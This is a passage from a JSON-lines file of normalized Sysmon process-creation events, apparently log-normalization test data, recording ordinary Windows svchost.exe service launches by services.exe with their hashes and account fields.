(WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:18.316Z", "type": "raw", "uuid": "b2367921-fb44-4882-97a8-35f69b3114b1"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:28.0681558Z\"},\"EventRecordID\":\"27632\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:18.271\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b766-5ea4-0000-001074830100}\"},{\"Name\":\"ProcessId\",\"text\":\"2772\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalService -p -s SstpSvc\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\LOCAL SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e5030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e5\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e5030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:local service@nt authority", "object.account.name": "local service", "object.account.privileges": "System", "object.account.session_id": "997", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k LocalService -p -s SstpSvc", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b766-5ea4-0000-001074830100", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "2772", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:local service@nt authority", "subject.account.name": "local service", "subject.account.privileges": "System", "subject.account.session_id": "997", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:18.271Z", "type": "raw", "uuid": "b231eb5a-62ea-4d39-9274-4d267703e647"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:28.0655304Z\"},\"EventRecordID\":\"27628\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:18.238\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b766-5ea4-0000-0010a7800100}\"},{\"Name\":\"ProcessId\",\"text\":\"2736\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s LanmanServer\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s LanmanServer", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b766-5ea4-0000-0010a7800100", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "2736", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:18.238Z", "type": "raw", "uuid": "afeb750a-0a83-4ca6-bba1-e5f3adf22fa6"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:28.0633563Z\"},\"EventRecordID\":\"27623\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:18.221\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b766-5ea4-0000-0010de7e0100}\"},{\"Name\":\"ProcessId\",\"text\":\"2704\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k LocalServiceNoNetwork -p -s DPS\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\LOCAL SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e5030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e5\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e5030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:local service@nt authority", "object.account.name": "local service", "object.account.privileges": "System", "object.account.session_id": "997", "object.process.cmdline": "C:\\Windows\\System32\\svchost.exe -k LocalServiceNoNetwork -p -s DPS", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b766-5ea4-0000-0010de7e0100", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "2704", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:local service@nt authority", "subject.account.name": "local service", "subject.account.privileges": "System", "subject.account.session_id": "997", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:18.221Z", "type": "raw", "uuid": "c0e73939-85f2-4997-883a-1b49bbc7af91"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:28.0149988Z\"},\"EventRecordID\":\"27619\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:18.166\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b766-5ea4-0000-0010067a0100}\"},{\"Name\":\"ProcessId\",\"text\":\"2640\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k utcsvc -p\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\System32\\svchost.exe -k utcsvc -p", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b766-5ea4-0000-0010067a0100", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "2640", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:18.166Z", "type": "raw", "uuid": "1c48105f-5c05-40af-baa1-9a33eee6d69d"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:27.9705336Z\"},\"EventRecordID\":\"27618\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:18.165\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b766-5ea4-0000-0010a4790100}\"},{\"Name\":\"ProcessId\",\"text\":\"2632\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k NetworkService -p -s CryptSvc\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\NETWORK SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e4030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e4\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e4030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:network service@nt authority", "object.account.name": "network service", "object.account.privileges": "System", "object.account.session_id": "996", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k NetworkService -p -s CryptSvc", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b766-5ea4-0000-0010a4790100", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "2632", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:network service@nt authority", "subject.account.name": "network service", "subject.account.privileges": "System", "subject.account.session_id": "996", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:18.165Z", "type": "raw", "uuid": "7e01fbd4-c338-47fe-a4bf-913348aeff57"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:27.8551010Z\"},\"EventRecordID\":\"27606\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:18.068\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b766-5ea4-0000-001046700100}\"},{\"Name\":\"ProcessId\",\"text\":\"2496\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s IKEEXT\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": 